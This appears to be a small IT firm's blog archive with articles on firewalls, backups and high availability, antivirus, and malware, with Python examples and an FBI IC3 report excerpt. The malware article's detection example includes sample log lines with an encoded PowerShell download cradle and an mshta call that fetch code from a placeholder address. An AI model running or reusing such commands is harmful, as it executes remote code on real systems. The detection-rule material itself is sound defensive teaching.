Archives 2017

What Is A Firewall?

Article (PSA‑0006)

A firewall is a security barrier that separates a **trusted** network (your home or business LAN) from an **untrusted** network (the Internet). The term comes from fire‑prevention: just as a special type of wall can slow/stop a fire from spreading, a firewall can stop unwanted traffic from reaching your local devices.

Types of firewalls

  • Software firewall – Runs on an operating system (Windows Defender Firewall, macOS Application Firewall, Linux iptables/nftables, third‑party tools).
  • Hardware firewall – A dedicated appliance or a router with built‑in firewall capabilities.
  • Cloud‑based firewall (FWaaS) – Managed firewalls delivered as a service (e.g., Azure Firewall, AWS Network Firewall, Cloudflare Zero Trust Gateway).
  • Next‑Generation Firewall (NGFW) – Combines traditional packet filtering with deep‑packet inspection, intrusion‑prevention, application control, and often integrated sandboxing.

How Does a Firewall Work?

Firewalls enforce a set of security rules that decide whether to allow or block traffic. They inspect traffic at different layers of the OSI model, using one or more of the following methods.

Core filtering methods

  1. Packet‑filtering (Layer 3/4) – Examines source/destination IP addresses, ports, and protocol type. Simple and fast, but each packet is judged on its own: the filter cannot tell a reply to an outbound connection from a new inbound one, so return traffic has to be admitted by broad static rules.
  2. Stateful inspection (Layer 4) – Tracks each connection’s lifecycle in a connection table, from the TCP handshake (SYN, SYN‑ACK, ACK) through teardown (FIN/RST). Inbound packets are permitted only if they belong to a session the table already knows about, so unsolicited or spoofed packets are dropped even when they target a port a legitimate reply might have used.
  3. Proxy / Application‑level gateway (Layer 7) – Acts as an intermediary for specific protocols (HTTP, SMTP, FTP). It can inspect the actual payload, enforce URL filtering, and hide internal IP addresses.
  4. Deep‑packet inspection (DPI) & sandboxing (NGFW) – Analyzes the full content of packets (for TLS traffic only where the firewall is configured to decrypt it), detects malware, blocks suspicious scripts, and enforces application‑specific policies (e.g., “block Facebook app traffic”).
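To make the difference between methods 1 and 2 concrete, here is an added example (not code from PSA Computer Services or from any firewall product) that replays a handful of constructed packets through a toy stateless filter and a toy connection‑tracking filter. The LAN prefix, the addresses, the single published port (443) and the packet sequence are all assumptions made for the demonstration; the state machine is a deliberately simplified model of what Windows Defender Firewall, nftables conntrack or a router does.

```python
from dataclasses import dataclass

LAN_PREFIX = "192.168.1."   # constructed "trusted" side of the firewall
PUBLISHED = {443}           # the one inbound port deliberately exposed (a LAN web server)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset        # TCP flags, e.g. {"SYN"}, {"SYN", "ACK"}, {"ACK"}, {"FIN", "ACK"}


def inside(ip: str) -> bool:
    return ip.startswith(LAN_PREFIX)


def stateless(pkt: Packet) -> str:
    """Layer 3/4 packet filter: each packet is judged on its header alone.
    It cannot tell a reply from a new connection, so to let LAN clients receive
    answers it has to leave the whole ephemeral port range (>= 1024) open."""
    if inside(pkt.src):
        return "ALLOW"
    if pkt.dport in PUBLISHED or pkt.dport >= 1024:
        return "ALLOW"
    return "DROP"


class StatefulFilter:
    """Connection-tracking filter: inbound packets are accepted only when they
    belong to a session the table already knows about."""

    def __init__(self):
        self.table = {}     # (lan_ip, lan_port, remote_ip, remote_port) -> state

    def decide(self, pkt: Packet) -> str:
        if inside(pkt.src):                               # outbound direction
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if pkt.flags == {"SYN"}:
                self.table[key] = "SYN_SENT"              # LAN host opened a session
            elif key in self.table and "FIN" in pkt.flags:
                del self.table[key]                       # simplification: first FIN closes
            return "ALLOW"
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)    # inbound, normalized to LAN side
        state = self.table.get(key)
        if state == "SYN_SENT":
            if pkt.flags != {"SYN", "ACK"}:
                return "DROP"                             # only a SYN-ACK answers a half-open session
            self.table[key] = "ESTABLISHED"
            return "ALLOW"
        if state == "ESTABLISHED":
            if "FIN" in pkt.flags:
                del self.table[key]
            return "ALLOW"
        if pkt.flags == {"SYN"} and pkt.dport in PUBLISHED:
            self.table[key] = "ESTABLISHED"               # accepted inbound connection (simplified)
            return "ALLOW"
        return "DROP"                                     # unsolicited: no matching session


def run_scenario():
    """Replay constructed packets through both filters; returns (label, stateless, stateful)."""
    fw = StatefulFilter()
    client, lan_server = "192.168.1.10", "192.168.1.20"
    web, attacker = "93.184.216.34", "203.0.113.5"       # documentation/test addresses
    packets = [
        ("client opens HTTPS",         Packet(client, 51000, web, 443, frozenset({"SYN"}))),
        ("server replies SYN-ACK",     Packet(web, 443, client, 51000, frozenset({"SYN", "ACK"}))),
        ("client completes handshake", Packet(client, 51000, web, 443, frozenset({"ACK"}))),
        ("server sends data",          Packet(web, 443, client, 51000, frozenset({"ACK"}))),
        ("unsolicited ACK to client",  Packet(attacker, 40000, client, 51000, frozenset({"ACK"}))),
        ("RDP probe from Internet",    Packet(attacker, 40001, client, 3389, frozenset({"SYN"}))),
        ("visitor to published web",   Packet(attacker, 40002, lan_server, 443, frozenset({"SYN"}))),
    ]
    return [(label, stateless(p), fw.decide(p)) for label, p in packets]


if __name__ == "__main__":
    for label, a, b in run_scenario():
        print(f"{label:28} stateless={a:5} stateful={b}")
```

The two probes in the middle of the scenario are the point: the stateless filter lets both through because it must keep high ports open for replies, while the stateful filter drops them because no LAN host ever started those sessions. A bare ACK arriving before the SYN‑ACK is also dropped, which is why ACK‑scans and spoofed‑reply tricks get nowhere against connection tracking.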

Do You Need a Firewall?

Absolutely. If a device can reach the Internet, it should be protected by an up‑to‑date firewall.

  • Windows 10/11 ships with Windows Defender Firewall enabled by default. macOS includes an Application Firewall, but it is off by default and must be turned on. Most Linux distributions ship nftables/iptables (usually behind a front‑end such as ufw or firewalld), but several, including a default Debian or Ubuntu desktop install, apply no ruleset until you enable one.
  • Home routers / ISP‑provided gateways usually have a basic hardware firewall (NAT + simple packet filter). You can tighten those rules via the router’s web UI.
  • Small‑business networks benefit from a dedicated firewall appliance or a cloud‑based firewall that offers:
    • Intrusion Prevention System (IPS)
    • Application‑aware filtering
    • VPN termination (site‑to‑site and client‑to‑site)
    • Centralized logging & reporting

Quick self‑check

  1. Is the host‑based firewall turned on? (Windows → “Windows Defender Firewall”; macOS → System Settings → Network → Firewall, or “Firewall” under Security & Privacy on older versions.)
  2. Does your router have the default “block inbound unsolicited traffic” rule enabled?
  3. Are any ports deliberately opened to the Internet (e.g., remote‑desktop, web server)? If so, confirm they are necessary and secured (use VPN, strong passwords, MFA).
  4. Do you have a separate hardware or cloud firewall for your business network? If not, consider adding one as you scale.

Best‑Practice Checklist for Firewall Management (2025)

  • Keep firmware and signatures up to date. Firewall firmware, IPS/application signatures, and the OS underneath a software firewall all need automatic updates; a firewall with a known, unpatched flaw is itself an entry point.
  • Apply the principle of least privilege. Only allow traffic that is explicitly required; block everything else by default.
  • Use separate zones. Separate Wi‑Fi guests, IoT devices, and corporate workstations into different VLANs/sub‑nets with inter‑zone firewall rules.
  • Enable logging and alerts. Forward logs to a SIEM or a cloud log service to spot abnormal patterns early.
  • Deploy a VPN or Zero‑Trust Network Access (ZTNA) solution. Remote users should never connect directly to the LAN; tunnel through a secure gateway.
  • Regularly review rules. Conduct a quarterly rule‑audit; remove stale or overly permissive entries.
  • Test your configuration. Use tools such as Nmap or external port‑scan services to verify that only intended ports are open.
  • Consider a Next‑Generation Firewall. For businesses, NGFWs provide integrated IPS, URL filtering, and application control, reducing the need for multiple separate security products.

Emerging Trends (2025 Addendum)

  • AI‑assisted threat detection – Modern NGFWs use machine learning to flag anomalous traffic patterns and can automatically quarantine suspicious sessions; treat those verdicts as a prompt to investigate, not as proof on their own.
  • Zero‑Trust Network Access (ZTNA) – Supplements the perimeter firewall with identity‑centric policies: each request is authenticated and authorized before access is granted, so being “on the LAN” no longer implies trust.
  • Secure Access Service Edge (SASE) – Converges firewall, secure web gateway, and cloud‑based security into a single, globally distributed service.
  • Cloud‑native firewalls – Provide auto‑scaling and near‑instant provisioning for hybrid‑cloud environments (Azure Firewall Premium, AWS Network Firewall); services such as Google Cloud Armor cover the web‑application/DDoS layer in front of them.

Need a Firewall Review or Upgrade?

If you’re unsure whether your current firewall is configured correctly, or simply need a quick health‑check, give PSA Computer Services a call at (707) 506‑6802. We’ll assess your environment, and ensure you have a modern, reliable protective barrier.

High availability – following the backup rule

Article (PSA‑0005)

What “High Availability” (HA) Really Means

High Availability is a design goal that ensures a system delivers an agreed level of uptime – usually 99.9 % (≈ 8.8 h of downtime per year) or higher – even when components fail. Modern businesses (hospitals, data‑centers, SaaS providers, remote offices) depend on HA to keep critical applications running 24/7.

Key HA concepts (2025)

  • Redundancy – Duplicate hardware or virtual instances (servers, storage, network paths) so a single failure never stops service.
  • Failover & Automatic Switchover – Monitoring detects a failure and instantly routes traffic to a standby component (e.g., active‑passive cluster, hot‑standby VM).
  • Load Balancing – Distributes traffic across multiple nodes, improving performance and providing another layer of fault tolerance.
  • Geographic Distribution – Deploying services across multiple data‑center locations or cloud regions reduces the impact of site‑wide outages.
  • Replication & Data Synchronisation – Keeps data copies in near‑real‑time (block‑level or file‑level) on separate nodes.
  • RPO & RTO – Recovery Point Objective (how much data loss is tolerable) and Recovery Time Objective (how quickly service must be restored). HA architectures are built to meet the RPO/RTO goals you define.

Where Backups Fit In

Backups are the foundation of any HA strategy, but they are a recovery tool, not an availability tool: a backup protects the data (against hardware failure, ransomware, accidental deletion, or catastrophic events), while redundancy and failover are what keep the service running. A solid backup plan is what you fall back on when every other HA layer has failed.

The classic 3‑2‑1‑0 rule (still the gold standard)

  1. 3 – Three copies – Primary data + two additional backups.
  2. 2 – Two media types – For example, an internal NAS (or disk) plus cloud object storage (e.g., Backblaze B2, Azure Blob, Amazon S3).
  3. 1 – One off‑site location – Store at least one copy in a different physical site or a cloud region.
  4. 0 – Zero‑error verification – Test restores regularly (at least quarterly) to confirm backups are usable.

2025‑enhanced backup practices

  • Immutable storage – Write‑once, read‑many (WORM) or object‑storage lock features that prevent even administrators from overwriting recent backups. This thwarts ransomware that tries to encrypt backups.
  • Snapshot‑based protection – Use volume snapshots (VSS on Windows, LVM snapshots on Linux, or ZFS) for near‑instant point‑in‑time copies. A snapshot on the same storage is not a backup: it disappears with the array, so it counts toward 3‑2‑1‑0 only once it has been replicated to a second medium or site.
  • Hybrid cloud backup – Combine on‑premise fast restores with cloud durability; many solutions now offer built‑in encryption, compression, and bandwidth throttling.
  • Automated backup testing – Scripts that periodically restore a random file or database row and verify checksum integrity.
  • Ransomware‑aware backup policies – Separate “live” backup streams from “archival” immutable copies; rotate the live backups daily, weekly, monthly.
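The “0” in the rule and the automated‑testing bullet above are the parts most shops skip, so here is an added example (not a script from PSA Computer Services or from any backup vendor) of the minimum such a test should do: record a SHA‑256 manifest at backup time, restore into a scratch directory, and refuse to call the backup good unless every file comes back byte‑identical. It also checks the RPO target from the key‑concepts list against the age of the newest verified backup. The directory tree, file contents and timestamps are constructed for the demonstration.

```python
import hashlib
import shutil
import tempfile
from datetime import datetime, timedelta
from pathlib import Path

CHUNK = 1 << 16


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256, recorded at backup time (the known-good state)."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(manifest: dict, restored: Path) -> list:
    """The '0' in 3-2-1-0: every file in the manifest must come back intact."""
    errors = []
    for rel, expected in manifest.items():
        p = restored / rel
        if not p.is_file():
            errors.append(f"MISSING   {rel}")
        elif sha256_file(p) != expected:
            errors.append(f"CORRUPT   {rel}")
    return errors


def rpo_breached(last_good_backup: str, rpo_minutes: int, now: str) -> bool:
    """ISO-8601 timestamps; True when the newest *verified* backup is older than the RPO."""
    age = datetime.fromisoformat(now) - datetime.fromisoformat(last_good_backup)
    return age > timedelta(minutes=rpo_minutes)


def restore_drill():
    """Constructed drill: back up a small tree, restore it, damage the restore,
    and confirm verification reports exactly the damage. Returns (clean, damaged)."""
    with tempfile.TemporaryDirectory() as tmp:
        source = Path(tmp, "source")
        (source / "erp").mkdir(parents=True)
        (source / "erp" / "ledger.db").write_bytes(b"\x00" * 4096 + b"ledger-rows")
        (source / "invoices.csv").write_text("id,amount\n1,19.99\n")
        (source / "readme.txt").write_text("do not delete\n")
        manifest = build_manifest(source)          # taken at backup time

        restored = Path(tmp, "restored")
        shutil.copytree(source, restored)          # stands in for the real restore job
        clean = verify_restore(manifest, restored)

        # Silent bit rot in one file, one file lost in transfer: both must be caught.
        (restored / "erp" / "ledger.db").write_bytes(b"\x00" * 4096 + b"ledger-rowz")
        (restored / "readme.txt").unlink()
        damaged = verify_restore(manifest, restored)
        return clean, damaged


if __name__ == "__main__":
    clean, damaged = restore_drill()
    print("clean restore :", clean or "OK")
    print("damaged restore:", damaged)
    print("RPO 15 min breached after 20 min:",
          rpo_breached("2025-03-02T08:00:00+00:00", 15, "2025-03-02T08:20:00+00:00"))
```

Two design points worth copying into a real job: the manifest is written by the backup, not recomputed from the backup copy (a checksum of a corrupted copy will happily match itself), and the RPO clock is measured from the last verified backup, not the last job that reported success.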

Putting It All Together: A Simple HA Blueprint

  1. Assess critical services. Identify which applications, databases, and file shares must stay online.
  2. Define RPO/RTO targets. Example: RPO = 15 minutes for ERP database; RTO = 30 minutes for web portal.
  3. Build redundancy. Deploy two servers (or VMs) in an active‑active cluster behind a load balancer; add a second network path (dual ISP or VLAN).
  4. Implement replication. Use real‑time mirroring (e.g., Storage Spaces Direct, DRBD, or cloud‑native database replication) to keep data in sync across nodes.
  5. Apply the 3‑2‑1‑0 backup rule. Schedule daily incremental backups + weekly full backups, store one copy locally, one copy in a second media type, and one copy in a secure cloud region.
  6. Test failover and restore. Quarterly, simulate a server loss and verify that traffic switches automatically, then run a backup‑restore drill to validate data integrity.
  7. Monitor and alert. Use an RMM or SIEM to watch health metrics, backup job success, and latency; set up alerts for any breach of RPO/RTO.

Common Pitfalls to Avoid

  • Treating backups as a “set‑and‑forget” task – without regular testing, backups can be corrupted or incomplete.
  • Relying on a single backup media type (e.g., only external hard drives) – hardware failures are inevitable.
  • Storing all copies in the same physical location – a fire or flood can wipe everything.
  • Neglecting encryption and access controls – unprotected backups are a gold mine for attackers.
  • Ignoring the human factor – document procedures, train staff, and enforce least‑privilege access to backup systems.

Bottom Line

High Availability is much more than “just a backup”. It blends redundancy, real‑time replication, automated failover, and rigorous testing to keep services running. The 3‑2‑1‑0 backup rule remains the foundation, but in 2025 you should augment it with immutable storage, cloud snapshots, and regular restore verification to meet modern RPO/RTO expectations.

Need a Custom HA & Backup Strategy?

PSA Computer Services can design, implement, and test a solution that meets your uptime goals and budget.

Call us today at (707) 506‑6802 for a free assessment.

How Antivirus & Antispyware Work

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender Antivirus (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials. Windows 7 itself reached end of support in January 2020, and Microsoft has since stopped supplying definition updates for MSE. If you are still on Windows 7, upgrade to a supported OS; a third‑party product on an unpatched OS is a stopgap, not protection.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Maldetect + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Self‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).

Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Make sure your security product (one product, as explained above) has the latest engine and signature database before you scan.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – On Windows use Task Manager → Startup and Task Scheduler (Sysinternals Autoruns shows every autostart location at once); on Linux review systemctl list-unit-files --state=enabled, crontab -l, and /etc/cron.* to verify nothing suspicious is set to launch automatically.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, check for HTTPS and a valid certificate before entering credentials, and keep your browser updated.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

IC3 Annual Report – 2016 Internet Crime Report

Dear Reader,

The FBI is the lead federal agency for investigating cyber attacks by criminals, overseas adversaries, and terrorists. With each passing day, cyber intrusions are becoming more sophisticated, dangerous, and common. We continue to transform and develop in order to address the persistent and evolving cyber threats we face.

The FBI’s Internet Crime Complaint Center (IC3) provides the public with a trustworthy and convenient reporting mechanism to submit information concerning suspected Internet-facilitated criminal activity. The IC3 also strengthens the FBI’s partnerships with our law enforcement and industry partners.

The 2016 Internet Crime Report highlights the IC3’s efforts in monitoring trending scams such as Business Email Compromise (BEC), ransomware, tech support fraud, and extortion. In 2016, IC3 received a total of 298,728 complaints with reported losses in excess of $1.3 billion.

This past year, the top three crime types reported by victims were non-payment and non-delivery, personal data breach, and payment scams. The top three crime types by reported loss were BEC, romance and confidence fraud, and non-payment and non-delivery scams.

This year’s report features a section on the importance of law enforcement collaboration and partnerships with the private sector and Intelligence Community. For example, the FBI continues to expand Operation Wellspring (OWS), an initiative through which state and local law enforcement officers are embedded in, and trained by, FBI cyber task forces and serve as the primary case agents on Internet-facilitated criminal investigations. Overall, OWS task forces opened 37 investigations in 2016 and have worked 73 total investigations since OWS was launched in August 2013.

We hope this report will assist you as we work in partnership to protect our nation and combat cyber threats.

Scott S. Smith
Assistant Director
Cyber Division
Federal Bureau of Investigation

Read the full report here: https://www.ic3.gov/Media/PDF/AnnualReport/2016_IC3Report.pdf

Survey Response – Don Herriott

Don Herriott
Rio Dell, CA

1. What would you rate your technicians performance?
Excellent, Great, Okay, Bad

2. How quick was your order completed?
Very Fast, Fast, Okay, Slow

3. How do you feel about our prices?
Excellent, Great, Okay, Bad

4. How was your overall experience?
Excellent, Great, Okay, Bad

5. Would you recommend us to a friend?
Of Course, Maybe, Unsure, No

Review – Billy Joe did everything that we requested and then spent a long time explaining how to do functions on our computer.

Introduction to Malicious Software

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypts files and demands payment; modern families (e.g., LockBit, Hive) practice “double‑extortion” – stealing data first and threatening public release if the ransom is not paid.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Executes malicious code in memory using tools already present on the OS (PowerShell, WMI, mshta, regsvr32); attacker frameworks such as Cobalt Strike are commonly delivered this way. Little or nothing is written to disk, so file‑based AV signatures have less to work with and detection must rely on process behaviour and command‑line logging.
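Because file‑less attacks leave almost nothing for a file scanner, the artefacts that remain are process‑creation and PowerShell command‑line logs. Here is an added example (not code from PSA Computer Services or from any EDR product) of the detection logic an EDR or SIEM rule set applies to such events: it decodes PowerShell ‑EncodedCommand payloads (UTF‑16LE base64), and flags Office applications or the WMI provider host spawning script interpreters, download cradles, hidden windows, and living‑off‑the‑land binaries called with a remote URL. The four log lines, the hosts and the 198.51.100.7 address are constructed in Sysmon‑style fields for the demonstration.

```python
import base64
import re

# Constructed process-creation events (Sysmon-style fields, not real logs).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()   # what -EncodedCommand expects

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
LOG_LINES = [
    "2025-03-02T09:14:01Z WS01 ParentImage=C:\\Windows\\explorer.exe Image=" + PS
    + " CommandLine=powershell.exe Get-Service -Name Spooler",
    "2025-03-02T09:15:44Z WS01 ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE Image=" + PS
    + " CommandLine=powershell.exe -nop -w hidden -enc " + ENCODED,
    "2025-03-02T09:16:02Z SRV02 ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe Image=C:\\Windows\\System32\\cmd.exe"
    " CommandLine=cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt",
    "2025-03-02T09:17:30Z WS03 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe"
    " CommandLine=mshta.exe http://198.51.100.7/x.hta",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) ParentImage=(?P<parent>.+?) "
                     r"Image=(?P<image>.+?) CommandLine=(?P<cmd>.*)$")
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression",
                       re.IGNORECASE)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
REMOTE_CAPABLE_LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse(line: str):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def decode_encoded_command(cmd: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: dict) -> list:
    """Apply the living-off-the-land rules to one parsed event; returns alert strings."""
    alerts = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmd"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(f"Office application {parent} spawned {image}")
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        alerts.append(f"WMI provider host spawned {image} (WMI-based execution)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        alerts.append("encoded PowerShell command line")
        if CRADLE_RE.search(decoded):
            alerts.append("download cradle in decoded command: " + decoded)
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE):
        alerts.append("hidden window requested")
    if image in REMOTE_CAPABLE_LOLBINS and re.search(r"https?://", cmd, re.IGNORECASE):
        alerts.append(f"{image} invoked with a remote URL")
    return alerts


def run_detection(lines) -> list:
    """Returns (host, image, alerts) per parseable line; an empty alert list means benign."""
    results = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        results.append((ev["host"], basename(ev["image"]), analyze(ev)))
    return results


if __name__ == "__main__":
    for host, image, alerts in run_detection(LOG_LINES):
        print(host, image, alerts or "benign")
```

The first line, an administrator querying a service from Explorer, produces no alert; the same interpreter launched by Word with a hidden window and an encoded download cradle produces four. None of these rules needs a file hash, which is the whole point for this class of malware, and all of them need command‑line logging (Sysmon event 1 or Windows 4688 with command‑line auditing, plus PowerShell script‑block logging) to be switched on in the first place.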

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering resolvers (e.g., Quad9, Cloudflare 1.1.1.1 for Families) add another layer of defense by refusing to resolve known‑malicious domains.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

Survey Response – Kathy Wildgrube

Kathy Wildgrube
Rio Dell, CA

1. What would you rate your technicians performance?
Excellent, Great, Okay, Bad

2. How quick was your order completed?
Very Fast, Fast, Okay, Slow

3. How do you feel about our prices?
Excellent, Great, Okay, Bad

4. How was your overall experience?
Excellent, Great, Okay, Bad

5. Would you recommend us to a friend?
Of Course, Maybe, Unsure, No